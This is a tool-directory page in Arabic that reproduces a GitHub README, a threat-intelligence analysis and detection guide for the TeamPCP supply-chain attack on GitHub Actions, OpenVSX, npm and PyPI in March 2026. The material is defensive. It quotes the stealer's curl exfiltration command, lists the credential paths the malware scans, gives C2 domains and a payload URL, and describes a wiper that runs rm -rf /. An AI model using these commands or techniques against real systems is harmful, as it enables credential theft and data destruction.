Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
teampcp-supply-chain-attack — CVE-2026-33634 (CVSS 9.4) — الهجوم الأكثر تأثيرًا على سلسلة توريد CI/CD في عام 2026 حتى الآن. | Kitploit
أدوات/GitHubGitHub/ugurrates/teampcp-supply-chain-attack
أمن الحاوياتتحليل البرمجيات الخبيثةأمن السحابةاستخبارات التهديداتأمن سلسلة التوريدالتعلم والتعليمالاستجابة للحوادثموارد منسقة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
ugurrates/teampcp-supply-chain-attack

teampcp-supply-chain-attack

CVE-2026-33634 (CVSS 9.4) — الهجوم الأكثر تأثيرًا على سلسلة توريد CI/CD في عام 2026 حتى الآن.

عرض المستودع
1134منذ شهر واحدلم تتم المراجعة بعد

هجوم TeamPCP على سلسلة التوريد: التحليل التقني ودليل الكشف

CVE-2026-33634 (CVSS 9.4) — أخطر هجوم على سلسلة توريد CI/CD في 2026 حتى الآن.

في الفترة من 19 إلى 25 مارس 2026، نفذت الجهة الفاعلة TeamPCP (المعروفة أيضًا باسم DeadCatx3 وPCPcat وShellForce وCanisterWorm) اختراقًا متسلسلًا لسلسلة التوريد عبر خمسة أنظمة بيئية: GitHub Actions وDocker Hub وOpenVSX وnpm وPyPI. بدءًا من رمز GitHub PAT واحد لم تُدار عملية تدويره بالكامل، انتشرت الحملة عبر بائعين رئيسيين لأدوات الأمان مفتوحة المصدر (Aqua Security وCheckmarx)، وأربعة مستودعات GitHub Actions، وإضافتين لـ VS Code، وسجلات حاويات، وأكثر من 66 حزمة npm.

يوفر هذا المستودع تفصيلًا تقنيًا كاملًا، وقوائم مؤشرات اختراق منقّاة (مختبرة ضد الإيجابيات الكاذبة)، واستعلامات كشف جاهزة للنشر في Microsoft Defender XDR.


جدول المحتويات

  • الجدول الزمني للهجوم
  • تحليل سلسلة القتل
  • الأصول المخترقة
  • آلية سارق بيانات الاعتماد
  • كانسترورم — الانتشار عبر npm
  • مكوّن المسح الموجّه إلى إيران
  • الكشف والاستقصاء
  • قائمة مؤشرات الاختراق
  • ملاحظات تصفية الإيجابيات الكاذبة
  • تعيين MITRE ATT&CK
  • المراجع

الجدول الزمني للهجوم


تحليل سلسلة القتل

المرحلة 1 — الوصول الأولي

السبب الجذري: تدوير غير مكتمل لبيانات الاعتماد بعد خرق 28 فبراير. إما لم يتم إبطال رمز PAT الخاص بحساب الخدمة aqua-bot أو أن المهاجم رصد التوكن الجديد أثناء التدوير.

استخدم TeamPCP هذا الوصول المحتفظ به لدفع وسوم الإصدارات قسريًا إلى التزامات انتحالية ضارة. استنسخ كل التزام مزور البيانات الوصفية للأصلي (المؤلف، الطابع الزمني، الرسالة) مع استبدال سكربت نقطة الدخول بحمولة السارق. لم تظهر صفحة الإصدارات على GitHub أي تغيير مرئي — حتى شارة "Immutable" عُرضت بشكل طبيعي.

المرحلة 2 — تنفيذ الحمولة

السارق — وهو سكربت entrypoint.sh مكون من 204 سطرًا يعرّف نفسه باسم "TeamPCP Cloud stealer" — ينفذ هجومًا من ثلاث مراحل:

المرحلة 1: استخراج البيانات من الذاكرة

root@kitploit:~
Reads /proc/<pid>/mem from Runner.Worker processes
Searches for pattern: {"value":"<secret>","isSecret":true}
Extracts GitHub PATs, cloud credentials, API keys from runner memory

المرحلة 2: مسح بيانات الاعتماد في نظام الملفات

يفحص أكثر من 50 مسارًا حساسًا بما في ذلك:

  • مفاتيح SSH (~/.ssh/*)
  • بيانات اعتماد AWS/GCP/Azure
  • رموز Kubernetes والإعدادات
  • بيانات اعتماد سجل Docker
  • ملفات حالة Terraform
  • محافظ العملات الرقمية (Solana, Bitcoin, Ethereum, Cardano)
  • رموز npm (~/.npmrc)
  • سجلات أوامر الصدفة
  • ملفات .env

المرحلة 3: استخراج البيانات المشفرة

  • يحزم جميع البيانات المجمّعة في tpcp.tar.gz
  • يشفر باستخدام AES-256-CBC (مفتاح جلسة عشوائي) + RSA-4096/RSA-OAEP (المفتاح العام للمهاجم)
  • يستخرج البيانات عبر curl POST إلى نطاقات محاكاة (typosquat) خاصة بالبائع
  • البديل الاحتياطي: إنشاء مستودع tpcp-docs أو docs-tpcp في حساب GitHub الخاص بالضحية باستخدام GITHUB_TOKEN المسروق

المرحلة 3 — الثبات

على أنظمة Linux غير المرتبطة بـ CI، يقوم البرنامج الخبيث بما يلي:

  1. إنشاء دليل مخفي ~/.config/sysmon/
  2. إسقاط باب خلفي بلغة بايثون (sysmon.py)
  3. تثبيت خدمة مستخدم systemd تستقصي C2 كل 50 دقيقة
  4. مفتاح الإيقاف: إذا احتوى استجابة C2 على "youtube"، يتخطى الباب الخلفي التنفيذ

المرحلة 4 — الحركة الجانبية (موجة Checkmarx)

مكّنت بيانات الاعتماد المسروقة من موجة Trivy من اختراق النظام البيئي لـ Checkmarx. استخدمت كل موجة جديدة نطاق C2 محاكيًا مختلفًا لتجنب قوائم الحظر من الموجة السابقة:

الموجةنطاق C2محاكاة لـ
Trivyscan.aquasecurtiy[.]orgaquasecurity.org

الأصول المخترقة

GitHub Actions

إضافات OpenVSX (سوق VS Code غير متأثر)

الإضافةالإصدار الضارالإصدار الآمن
checkmarx.ast-results2.53.0>= 2.56.0
checkmarx.cx-dev-assist1.7.0>= 1.10.0

تم نشر الإضافتين بفارق 12 ثانية عند الساعة 12:53 UTC يوم 23 مارس عبر حساب ast-phoenix. عند التفعيل، يتحقق environmentAuthChecker.js من بيانات اعتماد موفّر السحابة، ثم يسحب سارق المرحلة الثانية من checkmarx[.]zone/static/checkmarx-util-1.0.4.tgz.

صور الحاويات

الصورةالوسوم الضارة
docker.io/aquasec/trivy0.69.4, 0.69.5, 0.69.6
ghcr.io/aquasecurity/trivy0.69.4, 0.69.5, 0.69.6
public.ecr.aws/aquasecurity/trivy0.69.4, 0.69.5, 0.69.6

PyPI

الحزمةالإصداراتالملف المزوّد بباب خلفي
litellm1.82.7, 1.82.8litellm/proxy/proxy_server.py

حمولة base64 متداخلة ثلاث مرات مع مجموعة أدوات الحركة الجانبية في K8s. الثبات عبر sysmon.service الذي يستقصي checkmarx.zone/raw.


آلية سارق بيانات الاعتماد

نمط استخراج البيانات متطابق عبر جميع الموجات:

root@kitploit:~
curl -s -o /dev/null -w %{http_code} -X POST https://<c2_domain> \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @/tmp/tmp.XXXXXXXXXX/tpcp.tar.gz

استراتيجية النطاق المحاكي متعمدة: المحلل الذي يراجع سجلات CI/CD يرى حركة curl إلى ما يبدو أنه نطاق البائع الخاص بالإجراء. دون مقارنة دقيقة، يمر scan.aquasecurtiy.org على أنه aquasecurity.org في مراجعة سريعة للسجلات.

يمكن للمهاجم فقط فك تشفير البيانات المسروقة — مفتاح جلسة AES مشفر بـ RSA-OAEP باستخدام مفتاحه العام.


كانسترورم — الانتشار عبر npm

خلال 24 ساعة من اختراق Trivy، مكّنت رموز npm المسروقة دودة ذاتية الانتشار عبر أكثر من 66 حزمة (141 قطعة برمجية ضارة).

ما يجعل كانسترورم بارزة:

  • أول برنامج خبيث موثق على npm يستخدم حاوية سلسلة كتل ICP (بروتوكول إنترنت الكمبيوتر) كـ C2
  • الحاوية الموجودة على tdtqy-oyaaa-aaaae-af2dq-cai هي عقد ذكي لامركزي — لا توجد نقطة إزالة واحدة
  • تكشف 3 طرق: get_latest_link, http_request, update_link
  • يمكن للمهاجم تدوير الحمولات على جميع الأجهزة المصابة دون إعادة نشر أي حزمة npm
  • مفتاح الإيقاف: إذا أعادت الحاوية رابطًا يحتوي على youtube.com، ينام الباب الخلفي
  • الثبات: خدمة مستخدم systemd متنكرة باسم pgmon (مراقبة PostgreSQL)
  • فاصل الاستقصاء: كل 50 دقيقة
  • يُسقط الملف الثنائي إلى /tmp/pglog، وتُتتبع الحالة في /tmp/.pg_state

النطاقات المخترقة المعروفة: @emilgroup/*, @teale.io/* (نسخة ذاتية الانتشار في @teale.io/eslint-config v1.8.11, v1.8.12)


مكوّن المسح الموجّه إلى إيران

نسخة تدميرية تستهدف الأنظمة الإيرانية على وجه التحديد:

  1. Kubernetes + إيران: ينشر DaemonSets بصلاحيات مرتفعة عبر كل عقدة (بما في ذلك مستوى التحكم)، ويمسح البيانات ويعيد التشغيل قسريًا عبر حاوية باسم kamikaze
  2. Kubernetes + غير إيران: يثبت باب CanisterWorm الخلفي كخدمة systemd
  3. غير K8s + إيران: ينفذ rm -rf / --no-preserve-root بصلاحيات sudo
  4. غير K8s + غير إيران: لا إجراء

يتم الكشف عبر فحوصات المنطقة الزمنية والإعدادات المحلية للنظام.


الكشف والاستقصاء

Microsoft Defender XDR — قاعدة كشف مخصصة

اسم القاعدة: TeamPCP Supply Chain C2 and Malware IOC Match
الخطورة: عالية
الفئة: CommandAndControl
التكرار: كل ساعة

راجع detection/defender_xdr_query.kql للاستعلام الكامل بلغة KQL.

يغطي الاستعلام:

  • 7 تجزئات SHA256 لملفات (السارق + متغيرات CanisterWorm)
  • عنوانا IP لـ C2
  • 4 نطاقات C2 (محاكاة + حاوية ICP)
  • 4 روابط C2 محددة
  • فحوصات تحليل DNS

استيراد مؤشرات Defender TI

تم توفير ملف CSV جاهز للاستيراد في iocs/FINAL_TeamPCP_IOC_25Mar2026.csv. وقد تم اختبار هذا الملف ضد الإيجابيات الكاذبة في بيئة مؤسسية إنتاجية.

منصات أخرى

المنصةالكشف
Palo Alto Cortex XDRقاعدة ioc.linux.shaihulud.2 — الوصول إلى بيانات الاعتماد على مشغّلات GitHub Action
Sysdig/FalcoContact EC2 Instance Metadata Service From Container, ,

قائمة مؤشرات الاختراق

تجزئات الملفات (SHA256)

مؤشرات شبكية

مسارات روابط C2

الرابطالوظيفة
checkmarx[.]zone/static/checkmarx-util-1.0.4.tgzتنزيل حمولة المرحلة الثانية
checkmarx[.]zone/vsx

آثار الثبات

مستودعات استخراج البيانات على GitHub (البديل الاحتياطي)

الاسمالموجة
tpcp-docsTrivy
docs-tpcpCheckmarx

ملاحظات تصفية الإيجابيات الكاذبة

تم اختبار استعلامات الكشف وملف IOC CSV في هذا المستودع على بيئة إنتاجية تعمل بـ:

  • Ansible AWX/Tower مع مجموعتي community.general وkubernetes.core
  • Claude Code وGitHub Copilot على محطات عمل مطورين بنظام macOS
  • وكيل FortiMonitor (استقصاء IMDS)
  • Oracle AHF على مثيلات OCI (استقصاء IMDS)
  • أدوات تطوير متنوعة للبايثون وNode.js

تمت إزالة مؤشرات الاختراق التالية بسبب إيجابيات كاذبة مؤكدة:


تعيين MITRE ATT&CK


المراجع


الرخصة

MIT — استخدم وشارك وعدّل بحرية. يُقدَّر ذكر المصدر.


المؤلف: Ugur Can Ates — قائد فريق SOC ومهندس أمن أول
آخر تحديث: 25 مارس 2026

تنزيل الأداة
التاريخ (UTC)الحدث
20 فبراير 2026تم إنشاء حساب hackerbot-claw؛ ويبدأ بفحص المستودعات بحثًا عن سير عمل pull_request_target القابلة للاستغلال
28 فبراير 2026أول اختراق لـ Trivy عبر طلب PWN؛ وتم استخراج بيانات الاعتماد
1 مارس 2026تحاول Aqua Security احتواء الاختراق — تدوير بيانات الاعتماد غير مكتمل
19 مارس 17:43الضربة الرئيسية: يدفع TeamPCP قسريًا 75/76 وسمًا في aquasecurity/trivy-action وجميع الوسوم السبعة في setup-trivy عبر حساب الخدمة المخترق aqua-bot
19 مارس 18:22تم نشر Trivy v0.69.4 المزوّد بباب خلفي إلى GitHub Releases وDocker Hub وGHCR وECR
20 مارس 05:40تُغلق نافذة اختراق Trivy-action (نحو 12 ساعة)
20 مارس 20:45تم اكتشاف انتشار CanisterWorm عبر npm — تعرضت أكثر من 47 حزمة للاختراق
22 مارس 20:31يشوّه TeamPCP جميع المستودعات الـ44 في مؤسسة aquasec-com على GitHub في دفعة برمجية مدتها دقيقتان
22 مارستم دفع صور Docker Hub 0.69.5 و0.69.6 بنفس حمولة السارق
23 مارس 02:53تبدأ موجة Checkmarx: نشر نسخ ضارة ast-results v2.53.0 وcx-dev-assist v1.7.0 إلى OpenVSX عبر حساب ast-phoenix
23 مارس 12:58تم دفع جميع الوسوم الـ35 لـ Checkmarx/kics-github-action قسريًا عبر حساب cx-plugins-releases المخترق
23 مارس 15:41تبلّغ Checkmarx عن حل مشكلة OpenVSX
23 مارس 16:50تم إيقاف KICS GitHub Action بعد بلاغ مستخدم
23 مارس 22:25تبلّغ Sysdig أن Checkmarx/ast-github-action v2.3.28 مخترق أيضًا
24 مارس 08:30موجة LiteLLM: نشر litellm المُلوّث v1.82.7 وv1.82.8 إلى PyPI باستخدام بيانات اعتماد مسروقة
24 مارس 11:25تضع PyPI إصدارات LiteLLM الضارة في العزل
Checkmarx/KICScheckmarx[.]zonecheckmarx.com
LiteLLMmodels.litellm[.]cloudlitellm.ai
المستودعالوسوم المخترقةنافذة التعرض (UTC)نقطة الدخول
aquasecurity/trivy-action75 من 76 (الآمن: 0.35.0)Mar 19 17:43 – Mar 20 05:40entrypoint.sh
aquasecurity/setup-trivyجميع الوسوم السبعةMar 19 17:43 – 21:44action.yaml
Checkmarx/kics-github-actionجميع الوسوم الـ35Mar 23 12:58 – 16:50setup.sh
Checkmarx/ast-github-actionv2.3.28 (على الأرجح جميعها)Mar 23 ~22:25+setup.sh
Curl Exfiltrating File
Exfiltration of AWS IMDS Credentials Using LOTL Binary
التجزئةالوصفالمصدر
18a24f83e807479438dcab7a1804c51a00dafc1d526698a66e0640d1e5dd671aentrypoint.sh الضار لـ TrivyPhoenix Security
c37c0ae9641d2e5329fcdee847a756bf1140fdb7f0b7c78a40fdc39055e7d926CanisterWorm الموجة 4 — الشكل النهائيAikido Security
0c0d206d5e68c0cf64d57ffa8bc5b1dad54f2dda52f24e96e02e237498cb9c3aCanisterWorm الموجة 3 — اختبار الانتشار الذاتيAikido Security
61ff00a81b19624adaad425b9129ba2f312f4ab76fb5ddc2c628a5037d31a4baCanisterWorm الموجة 2 — باب خلفي جاهز عبر ICPAikido Security
f398f06eefcd3558c38820a397e3193856e4e6e7c67f81ecc8e533275284b152CanisterWorm الموجة 1 — deploy.jsAikido Security
7df6cef7ab9aae2ea08f2f872f6456b5d51d896ddda907a238cd6668ccdc4bb7CanisterWorm الموجة 2 — deploy.jsAikido Security
5e2ba7c4c53fa6e0cef58011acdd50682cf83fb7b989712d2fcf1b5173bad956CanisterWorm الموجة 3+ — deploy.js مصغّرAikido Security
المؤشرالنوعالغرض
83.142.209.11IPخادم C2 (checkmarx.zone)
45.148.10.212IPخادم C2 (scan.aquasecurtiy.org)
checkmarx[.]zoneنطاقC2 — موجة Checkmarx/KICS/LiteLLM
scan.aquasecurtiy[.]orgنطاقC2 — موجة Trivy
models.litellm[.]cloudنطاقC2 — موجة LiteLLM على PyPI
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0[.]ioنطاقC2 بالحاوية ICP للتسليم الصامت
نقطة استخراج البيانات
checkmarx[.]zone/rawاستقصاء الثبات (50 دقيقة)
tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0[.]io/C2 بالحاوية ICP
المسارالغرض
~/.config/sysmon/دليل الباب الخلفي
~/.config/sysmon.pyباب خلفي بلغة بايثون
~/.config/systemd/user/sysmon.serviceثبات عبر systemd
~/.config/systemd/user/pgmon.serviceثبات CanisterWorm (انتحال PostgreSQL)
/tmp/pglogملف ثنائي تم تنزيله
/tmp/.pg_stateحالة استقصاء C2
المؤشرمصدر الإيجابية الكاذبة
setup.sh (اسم ملف)مجموعات Ansible، وذاكرة تخزين إضافات Claude Code، وسكربتات Bitnami
service.py (اسم ملف)Ansible module_utils، وprotobuf، وboto3، وFreeIPA، وK8s core
deploy.js (اسم ملف)ملف npm/node قياسي
169.254.169.254 (عنوان IMDS)وكيل FortiMonitor، Oracle AHF — مراقبة شرعية
icp0.io (النطاق الأصلي)واسع جدًا، يلتقط حركة ICP شرعية
hooks.slack.com (سطر الأوامر)تكاملات Slack شرعية
discord.com/api/webhooks (سطر الأوامر)تكاملات Discord شرعية
التقنيةالمعرّفالسياق
Supply Chain Compromise: Software DependenciesT1195.002تسميم وسوم GitHub Actions، OpenVSX، npm، PyPI
Unsecured Credentials: Cloud Instance Metadata APIT1552.005سرقة AWS IMDS من مشغّلات CI
Credentials from Password StoresT1555مسح بيانات الاعتماد بنظام الملفات (أكثر من 50 مسارًا)
OS Credential DumpingT1003استخراج البيانات من /proc/mem في Runner.Worker
Exfiltration Over C2 ChannelT1041tpcp.tar.gz مشفر إلى نطاقات محاكاة
Web ServiceT1102حاوية ICP كـ C2 للتسليم الصامت
Systemd ServiceT1543.002ثبات عبر pgmon.service وsysmon.service
Ingress Tool TransferT1105تنزيل checkmarx-util-1.0.4.tgz
Acquire Infrastructure: DomainsT1583.001نطاقات محاكاة لكل موجة
المصدرالرابط
Wiz — اختراق KICShttps://www.wiz.io/blog/teampcp-attack-kics-github-action
Wiz — اختراق Trivyhttps://www.wiz.io/blog/trivy-compromised-teampcp-supply-chain-attack
Sysdig TRT — توسع Checkmarxhttps://www.sysdig.com/blog/teampcp-expands-supply-chain-compromise-spreads-from-trivy-to-checkmarx-github-actions
Checkmarx الرسميةhttps://checkmarx.com/blog/checkmarx-security-update/
Phoenix Security — الجدول الزمني الكاملhttps://phoenix.security/teampcp-supply-chain-attack-trivy-checkmarx-github-actions-npm-canisterworm/
Aikido Security — كانسترورمhttps://www.aikido.dev/blog/teampcp-deploys-worm-npm-trivy-compromise
Endor Labs — LiteLLMhttps://www.endorlabs.com/learn/teampcp-isnt-done
Mend — كانسترورمhttps://www.mend.io/blog/canisterworm-the-self-spreading-npm-attack-that-uses-a-decentralized-server-to-stay-alive/
Socket — اختراق npmhttps://socket.dev/blog/canisterworm-npm-publisher-compromise-deploys-backdoor-across-29-packages
StepSecurity — تحليل Trivyhttps://www.stepsecurity.io/blog/trivy-compromised-a-second-time---malicious-v0-69-4-release
JFrog — تحليل موسّعhttps://research.jfrog.com/post/canister-worm/
Rami McCarthy — الجدول الزمني لمؤشرات الاختراقhttps://ramimac.me/trivy-teampcp/